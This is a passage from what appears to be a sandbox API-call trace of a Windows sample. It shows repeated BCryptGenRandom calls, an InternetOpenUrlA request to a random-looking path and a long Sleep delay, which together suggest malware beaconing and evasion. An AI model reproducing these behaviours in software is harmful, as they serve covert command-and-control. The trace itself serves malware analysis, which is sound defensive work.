lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.129] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0275.130] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.130] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.130] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.130] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.131] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.131] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.131] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.131] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0275.131] GetProcessHeap () returned 0x440000 [0275.131] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x473350 [0275.132] lstrcpyA (in: lpString1=0x473350, lpString2="\x04" | out: lpString1="\x04") returned="\x04" [0275.132] lstrcatA (in: lpString1="\x04", lpString2="/2me9fpqZwofzYmz7qfu4Loem2Gvntb2E8koPpzs5o/" | out: lpString1="\x04/2me9fpqZwofzYmz7qfu4Loem2Gvntb2E8koPpzs5o/") returned="\x04/2me9fpqZwofzYmz7qfu4Loem2Gvntb2E8koPpzs5o/" [0275.132] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0275.132] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="\x04/2me9fpqZwofzYmz7qfu4Loem2Gvntb2E8koPpzs5o/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0275.132] GetProcessHeap () returned 0x440000 [0275.132] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x473350 | out: hHeap=0x440000) returned 1 [0275.132] GetProcessHeap () returned 0x440000 [0275.132] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4f53b0 | out: hHeap=0x440000) returned 1 [0275.133] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0275.133] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0275.134] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.134] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0275.134] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0275.134] Sleep (dwMilliseconds=0x19746) [0275.283] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.283] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0275.283] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.283] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0275.283] GetProcessHeap () returned 0x440000 [0275.283] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x95) returned 0x3a16f80 [0275.283] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.283] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0275.284] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.284] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a16f81, cbBuffer=0x27, dwFlags=0x2 | out: pbBuffer=0x3a16f81) returned 0x0 [0275.284] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.284] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.284] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.284] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.284] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.284] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.285] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.285] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0275.285] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.285] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0275.285] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.285] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0275.285] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.285] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.286] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.286] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.286] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.286] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0275.286] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.286] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.287] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.287] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0275.287] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.287] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.287] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.287] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.287] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.288] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.288] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.288] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.288] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.288] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.288] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.289] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0275.289] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.289] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0275.289] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.289] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.289] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.289] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.290] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.290] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0275.290] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.290] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0275.290] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.290] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.290] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.290] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.290] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.455] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.455] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.455] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0275.455] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.455] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.456] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.456] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.456] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.456] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.456] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.456] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0275.456] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.456] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0275.456] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.457] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0275.457] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.457] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a16fa8, cbBuffer=0x15, dwFlags=0x2 | out: pbBuffer=0x3a16fa8) returned 0x0 [0275.457] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.457] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.457] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.457] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.458] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.458] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0275.458] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.458] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.458] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.458] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.458] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.458] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.458] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.458] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.458] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.458] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.459] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.459] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0275.459] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.459] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.459] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.459] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.459] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.459] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.459] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.459] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.460] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.460] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0275.460] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.460] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.460] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.460] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.460] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.460] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0275.460] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.460] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0275.460] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.460] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a16fbd, cbBuffer=0x2f, dwFlags=0x2 | out: pbBuffer=0x3a16fbd) returned 0x0 [0275.461] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.461] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.461] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.461] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0275.461] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.461] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.461] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.461] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.462] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.462] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0275.462] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.462] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.462] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.462] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.462] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.462] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.462] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.463] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.463] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.463] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0275.463] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.463] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.463] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.463] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.463] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.463] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.463] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.464] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0275.464] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.464] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.464] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.464] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.464] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.464] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.464] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.464] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.464] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.464] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0275.465] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.465] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.465] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.465] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.465] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.465] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.465] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.465] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0275.465] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.466] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.466] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.466] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.466] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.466] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0275.466] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.466] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0275.466] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0275.466] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, 